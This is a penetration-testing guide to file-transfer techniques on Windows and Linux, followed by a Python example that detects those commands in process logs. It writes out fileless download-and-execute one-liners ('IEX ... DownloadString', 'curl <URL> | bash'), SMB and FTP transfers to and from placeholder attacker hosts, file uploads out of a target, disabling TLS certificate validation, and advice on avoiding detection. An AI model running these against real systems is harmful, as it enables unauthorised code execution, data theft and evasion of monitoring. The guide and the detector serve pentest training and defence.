File Transfer Techniques for Pentesting

Overview

File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.

Common Challenges

  • Host-based Controls

    • Application whitelisting

    • AV/EDR blocking

    • Process monitoring

  • Network Controls

    • Firewall restrictions

    • IDS/IPS monitoring

    • Port filtering

Windows Transfer Techniques

PowerShell Methods

Base64 Transfer (No Network Required)

# On Attacker (Linux)
cat file | base64 -w 0

# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))

# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5

Web Downloads

# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')

# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')

# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>

SMB Transfer

# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support

# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe

# Authenticated SMB
# On Attacker: Start SMB Server with Credentials
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test

# On Target: Map the Share
net use Z: \\<Attacker_IP>\share /user:test test

FTP Transfer

# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write

# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')

# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')

Living Off The Land (LOtL) Binaries

  • WMIC

  • Bitsadmin

  • Certutil

  • Regsvr32

Linux Transfer Techniques

Base64 Transfer

# Encode
cat file | base64 -w 0; echo

# Decode
echo -n '<base64_string>' | base64 -d > file

# Verify
md5sum file

Web Transfer Methods

Download

# Wget
wget <URL> -O /path/to/file

# cURL
curl -o /path/to/file <URL>

# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3

Upload

# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure

# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

SSH/SCP Transfer

# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh

# Download
scp username@<IP>:/remote/file /local/directory

# Upload
scp /local/file username@<IP>:/remote/directory

Simple Web Server

# Python3
python3 -m http.server

# PHP
php -S 0.0.0.0:8000

Common Issues & Solutions

SSL/TLS Issues (Windows)

# Disable certificate validation for .NET web requests in the current PowerShell process
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Port Considerations

  • HTTP/HTTPS (80/443) - Usually allowed

  • SMB (445) - Often blocked

  • FTP (20/21) - May be filtered

  • SSH/SCP (22) - May require configuration

Security Best Practices

  1. Transfer Verification

    • Always verify file integrity (MD5/SHA)

    • Check file permissions after transfer

  2. Operational Security

    • Clean up temporary files

    • Remove credentials after use

    • Monitor for security alerts

    • Use encryption when possible

  3. Fileless Operations

    • Prefer memory-only operations

    • Clean up artifacts

    • Be aware of logging/monitoring

  4. Network Security

    • Use HTTPS/FTPS when available

    • Consider file size limitations

    • Monitor for AV/EDR alerts
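
The "logging/monitoring" and "process monitoring" points above, seen from the monitoring side: an added example (not part of the original guide) that matches process command lines against the transfer commands listed on this page. The rule names, host names and sample events are constructed for illustration, and the addresses come from documentation ranges.

```python
import re

# Patterns for the transfer commands shown on this page. Rule names are
# hypothetical labels for this example, not identifiers from any product.
RULES = {
    "ps_webclient_transfer": r"Net\.WebClient\)\.(DownloadFile|UploadFile)\(",
    "ps_fileless_download": r"\bIEX\b.*DownloadString\(",
    "ps_base64_file_write": r"WriteAllBytes\(.*FromBase64String\(",
    "ps_tls_validation_off": r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}",
    "smb_share_by_ip": r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\",
    "sh_pipe_to_interpreter": r"\b(?:curl|wget)\b[^|]*\|\s*(?:bash|sh|python3?)\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

# Constructed process-creation events as (host, command line) pairs.
SAMPLE_EVENTS = [
    ("ws01", "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\""),
    ("ws01", "powershell -c \"(New-Object Net.WebClient).DownloadFile('ftp://192.0.2.10/file.txt', 'C:\\Temp\\out.txt')\""),
    ("ws02", "cmd.exe /c copy \\\\192.0.2.10\\share\\file.exe"),
    ("ws02", "powershell Get-FileHash C:\\Temp\\file.exe -Algorithm MD5"),  # benign
    ("web01", "sh -c curl http://192.0.2.10/run.sh | bash"),
    ("web01", "curl -o /tmp/pkg.tgz https://mirror.example.test/pkg.tgz"),  # benign
]


def match_rules(command_line):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(command_line))


def scan(events):
    """Return (host, rule, command_line) for every rule hit, in event order."""
    return [(host, rule, cmd) for host, cmd in events for rule in match_rules(cmd)]


if __name__ == "__main__":
    for host, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"{host:6} {rule:24} {cmd}")
```

A plain `curl -o` download and the `Get-FileHash` check produce no hit; only the command-line shapes this guide lists are matched, so real deployments would tune the patterns against their own baseline.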